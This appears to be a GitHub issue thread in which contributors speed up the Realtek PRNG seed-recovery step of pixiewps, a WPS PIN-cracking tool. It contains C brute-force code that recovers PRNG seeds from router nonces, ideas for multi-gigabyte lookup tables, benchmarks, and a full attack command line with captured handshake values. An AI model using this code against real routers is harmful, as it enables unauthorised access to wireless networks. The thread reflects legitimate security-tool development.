Performance improvement for the Realtek PRNG.
1yura opened this issue · 18 comments
I found a way to improve the performance of the Realtek PRNG.
/* Precomputed coefficients: each output word is a weighted sum (mod 2^32) of the 31
   initial LCG states; the four words use windows of this table shifted by one entry */
static const uint32_t realtek_fast_table[3 + 31] = {0x128e83b, 0xdafa31, 0x9f4828, 0xf66443, 0xbee24d, 0x817005, 0xcb918f, 0xa64845, 0x69c3cf, 0xa76dbd, 0x90a848, 0x57025f, 0x89126c, 0x7d9a8f, 0x48252a, 0x6fb2d4, 0x6ccc15, 0x3c5744, 0x5a998f, 0x5df917, 0x32ed77, 0x492688, 0x50e901, 0x2b5f57, 0x3acd0b, 0x456b7a, 0x25413d, 0x2f11f4, 0x3b564d, 0x203f14, 0x2589fc, 0x3283f8, 0x1c17e4, 0x1dd823};
static inline void realtek_fast_produce_nonce(uint32_t seed, uint8_t *dest) { /* convert seed to nonce; completely replaces srandom_r() + random_r(); seed != 0 */
    uint32_t word0 = 0, word1 = 0, word2 = 0, word3 = 0;
    for (int j = 0; j < 31; j++) {
        word0 += seed * realtek_fast_table[j + 3];
        word1 += seed * realtek_fast_table[j + 2];
        word2 += seed * realtek_fast_table[j + 1];
        word3 += seed * realtek_fast_table[j + 0];
        seed = (uint32_t)(((uint64_t)16807 * seed) % 2147483647);
    }
    word0 = htonl(word0 >> 1); memcpy(dest + 0,  &word0, 4);
    word0 = htonl(word1 >> 1); memcpy(dest + 4,  &word0, 4);
    word0 = htonl(word2 >> 1); memcpy(dest + 8,  &word0, 4);
    word0 = htonl(word3 >> 1); memcpy(dest + 12, &word0, 4);
}
static uint32_t realtek_fast_prepare_sample(uint8_t *nonce) { /* extract the first 1/4 of the nonce for testing */
    uint32_t res;
    memcpy(&res, nonce, sizeof(res));
    return ntohl(res);
}
static inline int realtek_fast_test_seed(uint32_t seed, uint32_t sample) { /* test against the first 1/4 of the nonce; on a match the whole nonce must be tested; seed != 0 */
    uint32_t word0 = 0;
    for (int j = 0; j < 31; j++) {
        word0 += seed * realtek_fast_table[j + 3];
        seed = (uint32_t)(((uint64_t)16807 * seed) % 2147483647);
    }
    word0 = word0 >> 1;
    return sample == word0 ? ret_ok : ret_fail;
}
And an example of how to use these functions:
uint32_t sample = realtek_fast_prepare_sample(wps->e_nonce);
int seed_found = 0;
for (uint32_t seed = 1; seed < 0xffffffff; seed++) {
    if (realtek_fast_test_seed(seed, sample) != ret_ok) {
        continue;
    }
    uint8_t test_nonce[WPS_NONCE_LEN];
    realtek_fast_produce_nonce(seed, test_nonce);
    if (memcmp(wps->e_nonce, test_nonce, WPS_NONCE_LEN) == 0) {
        seed_found = 1;
        break;
    }
}
It works about 5 times faster than the srandom_r() + random_r() chain. I have not tested it on a big-endian CPU.
Edit: added syntax coloring (wiire-a)
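If the table is correct, the fast function must reproduce the first four outputs of glibc's random() exactly. A minimal self-test sketch, assuming the reference chain is glibc's initstate_r()/random_r() with a 128-byte (TYPE_3) state and that realtek_fast_produce_nonce() from above is in scope:
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

int main(void) {
    for (uint32_t seed = 1; seed <= 1000000; seed++) {
        struct random_data buf;
        char state[128];              /* 128 bytes selects TYPE_3 (degree 31) */
        uint8_t ref[16], fast[16];

        memset(&buf, 0, sizeof(buf)); /* random_data must be zeroed before initstate_r() */
        initstate_r(seed, state, sizeof(state), &buf);
        for (int i = 0; i < 4; i++) {
            int32_t out;
            random_r(&buf, &out);
            uint32_t w = htonl((uint32_t)out);
            memcpy(ref + 4 * i, &w, 4);
        }

        realtek_fast_produce_nonce(seed, fast);
        if (memcmp(ref, fast, sizeof(ref)) != 0) {
            printf("mismatch at seed %u\n", seed);
            return 1;
        }
    }
    puts("first 1000000 seeds match");
    return 0;
}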
Thank you again for your contribution. I will test as soon as I have some spare time :)
The modulo operator is quite slow:
seed = (uint32_t) (((uint64_t)16807 * seed) % 2147483647);
can be substituted with this (should be ~30% faster):
const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);
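The trick behind this: writing p = a*2^31 + b with b < 2^31, and since 2^31 = 1 (mod 2^31 - 1), we get p = a + b (mod 2^31 - 1). A small sketch to convince yourself the folded value always agrees with the % result (the second fold is taken only when the first sum still exceeds 31 bits):
#include <assert.h>
#include <stdint.h>

int main(void) {
    for (uint64_t seed = 1; seed <= 10000000; seed++) {
        uint64_t p = 16807ULL * seed;
        uint64_t m = (p >> 31) + (p & 0x7fffffff);
        if (m & 0xffffffff80000000ULL)      /* fold once more if still >= 2^31 */
            m = (m >> 31) + (m & 0x7fffffff);
        /* m can end up as 0x7fffffff where the exact result is 0, but both are
           the same residue mod 2^31 - 1, so reduce both before comparing */
        assert(m % 2147483647 == p % 2147483647);
    }
    return 0;
}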
I did not notice that you replaced srandom_r() :)
Added the new code (7738fda).
I simplified the code a bit, like removing the htonl() functions and the % 2147483647 parts.
On my x86 machine it's about 60% faster, but my commit aimed for a quick and simple integration with the existing code. Some further testing and tweaking could be useful.
In the loop for (int j = 0; j < 31; j++) the last calculation of seed (when j == 30) is useless.
Yes. I think the code could be re-written this way:
static inline uint32_t glibc_fast_seed(uint32_t seed)
{
    uint32_t word0 = 0;
    for (int j = 3; j < 31 + 3 - 1; j++) {
        word0 += seed * glibc_seed_tbl[j];
        /* This does: seed = (16807LL * seed) % 0x7fffffff
           using the sum of digits method which works for mod N, base N+1 */
        const uint64_t p = 16807ULL * seed; /* Seed is always positive (31 bits) */
        seed = (p >> 31) + (p & 0x7fffffff);
    }
    return (word0 + seed * glibc_seed_tbl[33]) >> 1;
}
The variable seed is always positive, thus the multiplication 16807ULL * seed is 63 bits or less, and after the first shift (p >> 31) the top bits of p are always 0. So the second part:
/* The result might still not fit in 31 bits, if not, repeat
   (conditional seems to make it slightly faster) */
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
is useless. Maybe you can confirm that.
BTW if you want to come back to the IRC channel we can discuss these things there. I know that @rofl0r can be a bit annoying but bear with him ;)
Pushed the new changes (7acd739). On my laptop now the difference is much more noticeable compared to my old code: 4 times faster.
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
is useless. Maybe you can confirm that.
Not confirmed. For example, with seed 5951 glibc_fast_seed() gets a wrong result. I don't know why. With
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
everything is OK.
A constantly running messenger distracts me. But when there is something to discuss, I will join.
And about whether ralink_random() can produce any value or not: it can, I checked :)
I found something interesting: with
seed = 0xfffffffe
the function with the code
seed = (uint32_t)(((uint64_t)16807 * seed) % 2147483647);
produces the correct nonce, but the function with
const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);
produces a wrong nonce.
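A plausible explanation (an assumption, not confirmed in this thread): 0xfffffffe = 2 * (2^31 - 1), so the exact modulo sends the seed to 0, while the folded form lands on the equivalent representative 0x7fffffff. Both are the same residue mod 2^31 - 1, but they are different 32-bit values inside the mod-2^32 sums word0 += seed * table[...]. A small demo:
#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint32_t seed = 0xfffffffe;           /* == 2 * (2^31 - 1), i.e. 0 mod 2^31 - 1 */
    uint64_t p = 16807ULL * seed;
    uint64_t m = (p >> 31) + (p & 0x7fffffff);
    uint32_t folded = (uint32_t)((m & 0xffffffff80000000ULL)
                                 ? ((m >> 31) + (m & 0x7fffffff)) : m);
    uint32_t exact  = (uint32_t)(p % 2147483647);
    printf("folded = 0x%08x, exact = 0x%08x\n", folded, exact);
    /* prints folded = 0x7fffffff, exact = 0x00000000: the same residue mod
       2^31 - 1, but different 32-bit values fed into the mod-2^32 sums */
    return 0;
}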
Upd.
Try this fast function: https://0x0.st/sNXM.c
The output must be compared with the lower 7 bits of the first 32-bit word of the nonce.
Will do soon.
At the time I added the conditional because it seemed to be faster that way. In this function, however, it seems to make it noticeably slower, so I guess we should replace:
const uint64_t p = 16807ULL * seed;
const uint64_t m = (p >> 31) + (p & 0x7fffffff);
seed = (m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m;
with this:
uint64_t p = 16807ULL * seed;
p = (p >> 31) + (p & 0x7fffffff);
seed = (p >> 31) + (p & 0x7fffffff);
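One way to see why two unconditional folds suffice for a 32-bit seed (a bound sketch, not from the commit): p = 16807 * seed < 2^46, so the first fold gives a value below 2^31 + 2^15, and the second fold then yields a value no greater than 0x7fffffff. A quick check over the largest seeds:
#include <assert.h>
#include <stdint.h>

int main(void) {
    for (uint64_t seed = 0xffff0000ULL; seed <= 0xffffffffULL; seed++) {
        uint64_t p = 16807ULL * seed;       /* < 2^46 */
        p = (p >> 31) + (p & 0x7fffffff);   /* < 2^31 + 2^15 */
        p = (p >> 31) + (p & 0x7fffffff);   /* <= 0x7fffffff */
        assert(p <= 0x7fffffff);
    }
    return 0;
}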
In the current code negative values are never tested, since the seed always corresponds to the current time, so it's always positive. So I wouldn't add the check with:
seed = (seed == 0x7fffffff || seed == 0xfffffffe) ? 0 : seed;
which only slows down the cracking process.
If the current time is not retrieved from the router, the value of 0 (Unix Epoch) is returned. But seed = 0 returns a value of 0. So internally the PRNG checks if the seed is 0 and, if it is, changes it to 1, see glibc_random_old.c#L93:
/* We must make sure the seed is not 0. Take arbitrarily 1 in this case. */
if (seed == 0)
    seed = 1;
The value of 0x7fffffff would be OK, but it represents 03:14:07 of January 19th, 2038 (UTC). In practice it's never tested unless the user uses --end/start 02/2038. But honestly I wouldn't worry about it.
What's the purpose of doing REALTEK_FAST_SEED_STEP over and over again, if the seed doesn't change?
It updates the seed :)
#define REALTEK_FAST_SEED_STEP \
    p = 16807ULL * seed; \
    m = (p >> 31) + (p & 0x7fffffff); \
    seed = (uint32_t)((m & 0xffffffff80000000) ? ((m >> 31) + (m & 0x7fffffff)) : m);
Old:
2242.215146 task-clock (msec) # 3.727 CPUs utilized
217 context-switches # 0.097 K/sec
3 cpu-migrations # 0.001 K/sec
140 page-faults # 0.062 K/sec
5,116,201,317 cycles # 2.282 GHz (83.45%)
64,305,319 stalled-cycles-frontend # 1.26% frontend cycles idle (83.54%)
2,728,813,181 stalled-cycles-backend # 53.34% backend cycles idle (33.12%)
8,297,312,960 instructions # 1.62 insn per cycle
# 0.33 stalled cycles per insn (50.20%)
556,638,317 branches # 248.254 M/sec (66.95%)
4,441,275 branch-misses # 0.80% of all branches (83.47%)
0.601541662 seconds time elapsed
New:
2267.696976 task-clock (msec) # 3.741 CPUs utilized
227 context-switches # 0.100 K/sec
2 cpu-migrations # 0.001 K/sec
141 page-faults # 0.062 K/sec
5,179,056,557 cycles # 2.284 GHz (83.62%)
17,023,000 stalled-cycles-frontend # 0.33% frontend cycles idle (83.18%)
3,291,806,179 stalled-cycles-backend # 63.56% backend cycles idle (33.36%)
6,936,919,663 instructions # 1.34 insn per cycle
# 0.47 stalled cycles per insn (51.10%)
80,430,879 branches # 35.468 M/sec (67.60%)
320,102 branch-misses # 0.40% of all branches (83.81%)
0.606194954 seconds time elapsed
It doesn't really change anything for me. Even if you unroll or remove the for loop, the instructions are still executed sequentially since one depends on the other.
For example:
REALTEK_FAST_SEED_STEP
b += realtek_fast_lookup_4d[(uint8_t)seed]; /* This must wait for the operation above to finish (since seed is shared) */
REALTEK_FAST_SEED_STEP /* This must wait for the operation above to finish (since seed is shared) */
b += realtek_fast_lookup_5[(uint8_t)seed]; /* This must wait for the operation above to finish (since seed is shared) */
If instead we had something like:
for (...) {
    // ...
    independent_operation_A();
    independent_operation_B();
    // ...
}
those two would execute in parallel if they didn't share the same variables (seed in our case).
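A sketch of that idea applied here (realtek_fast_test_seed_x2 is a made-up name; it assumes the realtek_fast_table from the top of the thread and the double-fold reduction): testing two independent seeds per iteration gives the CPU two dependency chains that it can overlap.
static inline void realtek_fast_test_seed_x2(uint32_t seed_a, uint32_t seed_b,
                                             uint32_t sample,
                                             int *match_a, int *match_b) {
    uint32_t word_a = 0, word_b = 0;
    for (int j = 0; j < 31; j++) {
        word_a += seed_a * realtek_fast_table[j + 3];
        word_b += seed_b * realtek_fast_table[j + 3];
        uint64_t pa = 16807ULL * seed_a;   /* the two chains share no data, */
        uint64_t pb = 16807ULL * seed_b;   /* so the CPU can overlap them   */
        pa = (pa >> 31) + (pa & 0x7fffffff);
        pb = (pb >> 31) + (pb & 0x7fffffff);
        seed_a = (uint32_t)((pa >> 31) + (pa & 0x7fffffff));
        seed_b = (uint32_t)((pb >> 31) + (pb & 0x7fffffff));
    }
    *match_a = ((word_a >> 1) == sample);
    *match_b = ((word_b >> 1) == sample);
}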
Also, the most expensive operation is the modulo (%) or its variant in REALTEK_FAST_SEED_STEP; a precomputed table should maybe aim at avoiding or reducing that.
I pushed the changes to fix my previous commit so we have the same starting point to judge optimizations and modifications.
Maybe another consideration that could be useful is the fact that we test the seeds in sequence:
seed
seed + 1
seed + 2
...
or, backwards:
seed
seed - 1
seed - 2
...
Not sure if this helps, but if it did we could set up some intermediate table(s), e.g. initstate_table(seed).
I'm just throwing out ideas. I'm still not sure I understand what you did with your changes :)
I have no more ideas.
It should be noted that the nonce -> seed conversion is always fixed, therefore those for whom speed is important can use lookup tables. The full table is 16 GB, the optimized one is 8 GB. Or rainbow tables.
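A rough sketch of the full-table variant (seed_by_word0, build_table and lookup_seed are hypothetical names; it assumes the 16 GB array, 2^32 entries of 4 bytes, is allocated or mmap'd elsewhere, and that collisions are resolved by verifying the full nonce as in the loop above):
#include <stdint.h>
#include <string.h>

static uint32_t *seed_by_word0; /* 2^32 entries * 4 bytes = 16 GB, built offline */

/* Build once: map each possible first nonce word (raw 4 bytes) to a seed that
   produces it. Several seeds can share a word, so later entries overwrite
   earlier ones; candidates from lookup_seed() must be verified anyway. */
static void build_table(void) {
    uint8_t nonce[16];
    uint32_t w0;
    for (uint32_t seed = 1; seed != 0; seed++) { /* 1 .. 0xffffffff, then wraps */
        realtek_fast_produce_nonce(seed, nonce);
        memcpy(&w0, nonce, 4);
        seed_by_word0[w0] = seed;
    }
}

/* O(1) candidate lookup instead of walking the LCG for every seed */
static uint32_t lookup_seed(const uint8_t *e_nonce) {
    uint32_t w0;
    memcpy(&w0, e_nonce, 4);
    return seed_by_word0[w0]; /* 0 means no seed recorded for this word */
}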
We've come a long way. A simple benchmark over a 3-year period (--start 2017 --end 2014) on my laptop:
version | -j 1 | -j 4 | PRNG |
---|---|---|---|
1.3.0 | 108 s 362 ms | - | old |
pre-1.4.0 | 76 s 534 ms | 29 s 818 ms | old optimized |
1.4.1 | 27 s 105 ms | 9 s 221 ms | lazy |
git | 8 s 909 ms | 3 s 109 ms | yura |
Obviously the difference is less noticeable on a faster machine (e.g. my Desktop).
There will be a new release soon. Thank you :)
Data used:
./pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5